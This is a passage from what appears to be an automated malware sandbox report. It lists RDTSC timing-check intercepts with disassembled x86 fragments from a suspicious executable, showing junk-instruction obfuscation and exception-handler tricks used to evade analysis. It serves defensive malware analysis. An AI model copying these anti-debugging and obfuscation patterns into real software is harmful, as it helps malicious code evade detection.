eax 0x00000057 pushad 0x00000058 push eax 0x00000059 jng 00007F8C6D17D0A6h 0x0000005f pop eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pop esi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C7EB0 second address: 14C7EE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F8C6CC64786h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, ecx 0x00000011 push 00000000h 0x00000013 xor dword ptr [ebp+12466AE4h], esi 0x00000019 and esi, dword ptr [ebp+122D2D1Dh] 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 pop esi 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F8C6CC6478Eh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C997D second address: 14C99C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, dword ptr [ebp+122D2F78h] 0x00000012 push 00000000h 0x00000014 jno 00007F8C6D17D0B4h 0x0000001a push 00000000h 0x0000001c mov si, di 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8C6D17D0ABh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C99C5 second address: 14C99CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14C99CB second address: 14C99CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D095F second address: 14D0963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACCA second address: 14CACCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACCE second address: 14CACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14CACD4 second address: 14CACF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F8C6D17D0B1h 0x00000011 jmp 00007F8C6D17D0ABh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B2D second address: 14D3B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B34 second address: 14D3B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B42 second address: 14D3B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D3B46 second address: 14D3B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D697D second address: 14D699B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8C6CC64795h 0x0000000f jmp 00007F8C6CC6478Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D2B17 second address: 14D2B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D924A second address: 14D9254 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D9254 second address: 14D925A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D4B68 second address: 14D4BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8C6CC64792h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D2603h] 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr [ebp+122D3328h], ecx 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F8C6CC64788h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov eax, dword ptr [ebp+122D0E3Dh] 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007F8C6CC64788h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 push FFFFFFFFh 0x00000064 sub dword ptr [ebp+122D3305h], edx 0x0000006a push eax 0x0000006b push edi 0x0000006c push eax 0x0000006d push edx 0x0000006e push edx 0x0000006f pop edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DB266 second address: 14DB26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D5C48 second address: 14D5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC347 second address: 14DC34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC34B second address: 14DC354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6AEE second address: 14D6AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D93B1 second address: 14D93B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6AF2 second address: 14D6B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B0F second address: 14D6B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DD287 second address: 14DD28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DA387 second address: 14DA3EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c pushad 0x0000000d mov dword ptr [ebp+122D3601h], edx 0x00000013 popad 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov ebx, dword ptr [ebp+122D38EDh] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F8C6CC64788h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 cmc 0x00000043 mov eax, dword ptr [ebp+122D0A8Dh] 0x00000049 sub dword ptr [ebp+122D34A7h], edx 0x0000004f push FFFFFFFFh 0x00000051 mov bx, FFE1h 0x00000055 mov edi, dword ptr [ebp+122D2B95h] 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D9472 second address: 14D94AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F8C6D17D0C7h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8C6D17D0B5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC48D second address: 14DC491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B15 second address: 14D6B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F8C6D17D0B0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DA3EF second address: 14DA3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC491 second address: 14DC537 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C6D17D0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e cmc 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr [ebp+122D2E03h], eax 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov dword ptr [ebp+12469FF4h], ecx 0x00000029 mov eax, dword ptr [ebp+122D0B0Dh] 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F8C6D17D0A8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 add dword ptr [ebp+1245B9D0h], edi 0x0000004f jmp 00007F8C6D17D0B4h 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007F8C6D17D0A8h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 0000001Dh 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 cld 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F8C6D17D0B4h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6B28 second address: 14D6BAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F8C6CC64788h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 sub bh, FFFFFFC1h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b jo 00007F8C6CC64788h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 call 00007F8C6CC6478Fh 0x0000003d mov bx, cx 0x00000040 pop edi 0x00000041 mov eax, dword ptr [ebp+122D0DADh] 0x00000047 push FFFFFFFFh 0x00000049 call 00007F8C6CC64796h 0x0000004e call 00007F8C6CC6478Dh 0x00000053 pop ebx 0x00000054 pop edi 0x00000055 nop 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE3D8 second address: 14DE3FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F8C6D17D0B8h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DC537 second address: 14DC550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14D6BAC second address: 14D6BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE3FC second address: 14DE406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8C6CC64786h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE406 second address: 14DE40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E06D6 second address: 14E06E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE57E second address: 14DE582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E06E3 second address: 14E06E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE582 second address: 14DE59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F8C6D17D0ACh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14DE59B second address: 14DE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E26D2 second address: 14E26D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E26D6 second address: 14E26DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E2C87 second address: 14E2CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E2CA1 second address: 14E2CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E991B second address: 14E9926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9926 second address: 14E9938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9938 second address: 14E998C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B5h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8C6D17D0AEh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C6D17D0B1h 0x0000001d jmp 00007F8C6D17D0B2h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E998C second address: 14E99A4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C6CC64786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F8C6CC6478Eh 0x00000010 jne 00007F8C6CC64786h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E99A4 second address: 14E99AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9B27 second address: 14E9B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9B2B second address: 14E9B60 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C6D17D0C3h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F8C6D17D116h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9B60 second address: 14E9B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64797h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9B7B second address: 14E9BA6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8C6D17D0A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8C6D17D0A6h 0x00000014 jmp 00007F8C6D17D0B7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9E71 second address: 14E9EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8C6CC64788h 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F8C6CC64791h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F8C6CC6478Dh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14E9EA1 second address: 14E9ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6D17D0B0h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C6D17D0B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14EEAC8 second address: 14EEB25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8C6CC64799h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push esi 0x00000013 jns 00007F8C6CC6479Bh 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f jmp 00007F8C6CC64791h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14EEB25 second address: 14EEB29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5607 second address: 14F560B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F560B second address: 14F5611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5611 second address: 14F5624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007F8C6CC64786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5624 second address: 14F5633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F49BE second address: 14F49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64795h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F49D7 second address: 14F4A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F8C6D17D0AFh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F4B2C second address: 14F4B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C6CC64797h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F4CBA second address: 14F4CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F4E22 second address: 14F4E2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5258 second address: 14F525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F525C second address: 14F526E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F8C6CC6478Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F526E second address: 14F5272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F544A second address: 14F544F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F544F second address: 14F5456 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F5456 second address: 14F547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8C6CC64797h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F547B second address: 14F548F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C6D17D0ADh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 14F548F second address: 14F5497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
